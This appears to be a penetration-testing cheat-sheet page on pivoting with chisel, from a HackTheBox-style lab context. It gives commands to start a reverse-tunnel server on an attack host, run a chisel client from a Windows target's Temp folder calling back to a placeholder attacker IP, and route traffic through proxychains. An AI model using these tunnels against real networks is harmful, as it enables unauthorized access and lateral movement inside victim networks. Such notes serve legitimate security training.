chisel

Chisel - Reverse Tunnel

  • Attack Host

./chisel server --reserve

2022/11/06 10:57:00 server: Reverse tunnelling enabled
2022/11/06 10:57:00 server: Fingerprint CelKxt2EsL1SUFnvo634FucIOPqlFKQJi8t/aTjRfWo=
2022/11/06 10:57:00 server: Listening on http://0.0.0.0:8080

  • Target Host

C:\Windows\Temp\chisel.exe client <ip_attacker>:8080 R:socks

  • Verify Listening Port

dado1513@htb[/htb]$ netstat -lnpt | grep 1080

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:1080          0.0.0.0:*               LISTEN      446306/./chisel

  • Configure Proxychains

dado1513@htb[/htb]$ cat /etc/proxychains.conf

<SNIP>

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5  127.0.0.1 1080

  • Killing Chisel

Stop-Process -Name chisel -Force

Target Host as Server

  • Target Host

PS> C:\Windows\Temp\chisel.exe server --socks5

  • Attack Host

dado1513@htb[/htb]$ sudo chisel client 10.129.204.133:8080 socks

2022/11/22 06:56:01 client: Connecting to ws://10.129.204.133:8080
2022/11/22 06:56:01 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/11/22 06:56:02 client: Connected (Latency 124.871246ms)
PreviousNetExecNextbloodyAD

Last updated